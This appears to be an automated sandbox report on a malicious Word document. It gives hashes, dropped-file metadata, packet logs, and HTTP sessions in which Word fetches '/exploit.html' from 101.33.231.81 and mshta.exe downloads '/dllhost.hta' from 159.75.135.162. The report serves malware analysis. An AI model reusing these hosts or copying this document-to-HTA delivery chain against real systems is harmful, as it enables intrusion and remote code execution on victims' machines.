                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):48956
                                                                                                                                                                            Entropy (8bit):5.103589775370961
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                            MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                            SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                            SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                            SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="
                                                                                                                                                                            File type:Microsoft OOXML
                                                                                                                                                                            Entropy (8bit):7.997351182794523
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                                            • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                                            • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                                            File name:V3g2Pfu707.docx
                                                                                                                                                                            File size:520148
                                                                                                                                                                            MD5:b60cd79e2c14dbeefa22197f76fc3437
                                                                                                                                                                            SHA1:07a2811a3ea7a4a0c84e52cb5a48f1e712b55fd9
                                                                                                                                                                            SHA256:6ddab79a6d836f9c1ed9ab3bbe28a074c0c93bd87f55144ed62b23c0032715d1
                                                                                                                                                                            SHA512:3c565f6be03534118eaf0b35221a4962d7ff8b64af3408ec72949809e9fe8e935652e38dbdaff8960c5e5b886e81d1c0014cb4981e5fed153833e6877c8a8b21
                                                                                                                                                                            SSDEEP:12288:ZTAhQSKy2e6tLkAPqq/Q62J0yLz+hyXF+uObrp:1AGSs5Dqq/Qvz+hQU1
                                                                                                                                                                            TLSH:A6B423F798435185CB2A58BBD80B829BDCF096B724341DD2BCBC24878BC578E4A67527
                                                                                                                                                                            File Content Preview:PK...........T-../j...........[Content_Types].xml...j.0.E.....6.J.(.....e.h...4v.......c;5%$64..`..{.Xb...V..|...d..I..[!M....k.@....LY.9.A ....x.s..T...e.......Y......z."...:..Y..n8.....&... ..3.l.b.........$OMc....+..@.j<.p.a.).Y.:].q@...2T.=a)].`....r:
                                                                                                                                                                            Icon Hash:74fcd0d2d6d6d0cc
                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Jun 16, 2022 14:20:01.900645018 CEST4974662563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:02.133006096 CEST6256349746101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:02.133150101 CEST4974662563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:02.135394096 CEST4974662563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:02.359359980 CEST6256349746101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:02.359416008 CEST6256349746101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:02.359455109 CEST6256349746101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:02.359539032 CEST4974662563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:02.371578932 CEST4974662563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:02.468226910 CEST4974762563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:02.686306000 CEST6256349747101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:02.686450005 CEST4974762563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:02.686994076 CEST4974762563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:02.904742002 CEST6256349747101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:02.905064106 CEST6256349747101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:02.905086994 CEST6256349747101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:02.905184031 CEST4974762563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:02.905255079 CEST4974762563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:03.126285076 CEST6256349747101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:05.961309910 CEST4974862563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:06.190330029 CEST6256349748101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:06.190459013 CEST4974862563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:06.190567017 CEST4974862563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:06.418637991 CEST6256349748101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:06.419333935 CEST6256349748101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:06.419361115 CEST6256349748101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:06.419506073 CEST4974862563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:06.420177937 CEST4974862563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:06.522555113 CEST4974962563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:06.750639915 CEST6256349749101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:06.750817060 CEST4974962563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:06.751089096 CEST4974962563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:06.981957912 CEST6256349749101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:06.982336998 CEST6256349749101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:06.982383966 CEST6256349749101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:06.982436895 CEST6256349749101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:06.982460022 CEST4974962563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:06.982486963 CEST6256349749101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:06.982521057 CEST4974962563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:06.982546091 CEST6256349749101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:06.982549906 CEST4974962563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:06.982584953 CEST6256349749101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:06.982610941 CEST4974962563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:06.982651949 CEST4974962563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:06.984752893 CEST4974962563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:07.168987036 CEST4975062563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:07.209604979 CEST6256349749101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:07.395502090 CEST6256349750101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:07.395735025 CEST4975062563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:07.395937920 CEST4975062563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:07.626498938 CEST6256349750101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:07.629883051 CEST6256349750101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:07.629930973 CEST6256349750101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:07.630073071 CEST4975062563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:07.630156040 CEST4975062563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:07.630160093 CEST4975062563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:07.852909088 CEST6256349750101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:07.871310949 CEST4975162563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:08.107610941 CEST6256349751101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:08.107745886 CEST4975162563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:08.133632898 CEST4975162563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:08.362663984 CEST6256349751101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:08.362894058 CEST6256349751101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:08.362912893 CEST6256349751101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:08.363102913 CEST4975162563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:08.365233898 CEST4975162563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:08.406281948 CEST4975262563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:08.596543074 CEST6256349751101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:08.642559052 CEST6256349752101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:08.642770052 CEST4975262563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:08.643004894 CEST4975262563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:08.870064974 CEST6256349752101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:08.870100975 CEST6256349752101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:08.870124102 CEST6256349752101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:08.870325089 CEST4975262563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:08.870409966 CEST4975262563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:08.904798985 CEST4975362563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:09.125413895 CEST6256349753101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:09.125642061 CEST4975362563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:09.125781059 CEST4975362563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:09.343839884 CEST6256349753101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:09.344546080 CEST6256349753101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:09.344568968 CEST6256349753101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:09.344683886 CEST4975362563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:09.345591068 CEST4975362563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:09.364561081 CEST4975462563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:09.565346956 CEST6256349753101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:09.595829964 CEST6256349754101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:09.595948935 CEST4975462563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:09.596090078 CEST4975462563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:09.820771933 CEST6256349754101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:09.821291924 CEST6256349754101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:09.821315050 CEST6256349754101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:09.821413994 CEST4975462563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:09.821537971 CEST4975462563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:09.832215071 CEST4975562563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:10.060343027 CEST6256349755101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:10.060432911 CEST4975562563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:10.060765028 CEST4975562563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:10.292787075 CEST6256349755101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:10.292975903 CEST6256349755101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:10.293080091 CEST6256349755101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:10.293131113 CEST4975562563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:10.295248985 CEST4975562563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:10.339620113 CEST4975562563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:10.346128941 CEST4975662563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:10.567341089 CEST6256349755101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:10.567751884 CEST6256349756101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:10.567930937 CEST4975662563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:10.625039101 CEST4975662563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:10.852756023 CEST6256349756101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:10.853050947 CEST6256349756101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:10.853066921 CEST6256349756101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:10.853173971 CEST4975662563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:10.853267908 CEST4975662563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:11.083395958 CEST6256349756101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:11.173162937 CEST4975762563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:11.398674965 CEST6256349757101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:11.398869991 CEST4975762563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:11.883615017 CEST4975762563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:12.108988047 CEST6256349757101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:12.109253883 CEST6256349757101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:12.109272957 CEST6256349757101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:12.109360933 CEST4975762563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:12.109405041 CEST4975762563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:12.109456062 CEST4975762563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:12.335897923 CEST6256349757101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:19.573633909 CEST4975862563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:19.799110889 CEST6256349758101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:19.799297094 CEST4975862563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:19.800246954 CEST4975862563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:20.026499987 CEST6256349758101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:20.026706934 CEST6256349758101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:20.026738882 CEST6256349758101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:20.026778936 CEST4975862563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:20.026817083 CEST4975862563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:20.026829004 CEST4975862563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:20:20.253750086 CEST6256349758101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:20.253782988 CEST6256349758101.33.231.81192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:20:20.253880978 CEST4975862563192.168.2.3101.33.231.81
                                                                                                                                                                            Jun 16, 2022 14:21:44.083216906 CEST4978161256192.168.2.3159.75.135.162
                                                                                                                                                                            Jun 16, 2022 14:21:44.313682079 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.315840006 CEST4978161256192.168.2.3159.75.135.162
                                                                                                                                                                            Jun 16, 2022 14:21:44.362382889 CEST4978161256192.168.2.3159.75.135.162
                                                                                                                                                                            Jun 16, 2022 14:21:44.601610899 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.602528095 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.602585077 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.602626085 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.602655888 CEST4978161256192.168.2.3159.75.135.162
                                                                                                                                                                            Jun 16, 2022 14:21:44.602667093 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.602699041 CEST4978161256192.168.2.3159.75.135.162
                                                                                                                                                                            Jun 16, 2022 14:21:44.602705002 CEST4978161256192.168.2.3159.75.135.162
                                                                                                                                                                            Jun 16, 2022 14:21:44.602710009 CEST4978161256192.168.2.3159.75.135.162
                                                                                                                                                                            Jun 16, 2022 14:21:44.602710009 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.602752924 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.602766037 CEST4978161256192.168.2.3159.75.135.162
                                                                                                                                                                            Jun 16, 2022 14:21:44.602792025 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.602804899 CEST4978161256192.168.2.3159.75.135.162
                                                                                                                                                                            Jun 16, 2022 14:21:44.602833986 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.602849007 CEST4978161256192.168.2.3159.75.135.162
                                                                                                                                                                            Jun 16, 2022 14:21:44.602880001 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.602890015 CEST4978161256192.168.2.3159.75.135.162
                                                                                                                                                                            Jun 16, 2022 14:21:44.602920055 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.602930069 CEST4978161256192.168.2.3159.75.135.162
                                                                                                                                                                            Jun 16, 2022 14:21:44.602971077 CEST4978161256192.168.2.3159.75.135.162
                                                                                                                                                                            Jun 16, 2022 14:21:44.832551003 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.832611084 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.832649946 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.832689047 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.832731009 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.832781076 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.832818985 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.832859039 CEST4978161256192.168.2.3159.75.135.162
                                                                                                                                                                            Jun 16, 2022 14:21:44.832866907 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            Jun 16, 2022 14:21:44.832915068 CEST4978161256192.168.2.3159.75.135.162
                                                                                                                                                                            Jun 16, 2022 14:21:44.832926035 CEST4978161256192.168.2.3159.75.135.162
                                                                                                                                                                            Jun 16, 2022 14:21:44.857872009 CEST4978161256192.168.2.3159.75.135.162
                                                                                                                                                                            Jun 16, 2022 14:21:45.088077068 CEST6125649781159.75.135.162192.168.2.3
                                                                                                                                                                            • 101.33.231.81:62563
                                                                                                                                                                            • 159.75.135.162:61256
                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            0192.168.2.349746101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jun 16, 2022 14:20:02.135394096 CEST1293OUTOPTIONS / HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            Host: 101.33.231.81:62563
                                                                                                                                                                            Jun 16, 2022 14:20:02.359416008 CEST1293INHTTP/1.0 501 Unsupported method ('OPTIONS')
                                                                                                                                                                            Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                                                            Date: Thu, 16 Jun 2022 12:20:02 GMT
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                            Content-Length: 500


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            1192.168.2.349747101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jun 16, 2022 14:20:02.686994076 CEST1294OUTHEAD /exploit.html HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            Host: 101.33.231.81:62563
                                                                                                                                                                            Jun 16, 2022 14:20:02.905064106 CEST1295INHTTP/1.0 200 OK
                                                                                                                                                                            Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                                                            Date: Thu, 16 Jun 2022 12:20:02 GMT
                                                                                                                                                                            Content-type: text/html
                                                                                                                                                                            Content-Length: 5737
                                                                                                                                                                            Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            10192.168.2.349756101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jun 16, 2022 14:20:10.625039101 CEST1312OUTHEAD /exploit.html HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 101.33.231.81:62563
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 16, 2022 14:20:10.853050947 CEST1313INHTTP/1.0 200 OK
                                                                                                                                                                            Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                                                            Date: Thu, 16 Jun 2022 12:20:10 GMT
                                                                                                                                                                            Content-type: text/html
                                                                                                                                                                            Content-Length: 5737
                                                                                                                                                                            Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            11192.168.2.349757101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jun 16, 2022 14:20:11.883615017 CEST1314OUTHEAD /exploit.html HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 101.33.231.81:62563
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 16, 2022 14:20:12.109253883 CEST1314INHTTP/1.0 200 OK
                                                                                                                                                                            Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                                                            Date: Thu, 16 Jun 2022 12:20:11 GMT
                                                                                                                                                                            Content-type: text/html
                                                                                                                                                                            Content-Length: 5737
                                                                                                                                                                            Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            12192.168.2.349758101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jun 16, 2022 14:20:19.800246954 CEST1315OUTHEAD /exploit.html HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 101.33.231.81:62563
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 16, 2022 14:20:20.026706934 CEST1315INHTTP/1.0 200 OK
                                                                                                                                                                            Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                                                            Date: Thu, 16 Jun 2022 12:20:19 GMT
                                                                                                                                                                            Content-type: text/html
                                                                                                                                                                            Content-Length: 5737
                                                                                                                                                                            Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            13192.168.2.349781159.75.135.16261256C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jun 16, 2022 14:21:44.362382889 CEST7317OUTGET /dllhost.hta HTTP/1.1
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                            Host: 159.75.135.162:61256
                                                                                                                                                                            Connection: Keep-Alive
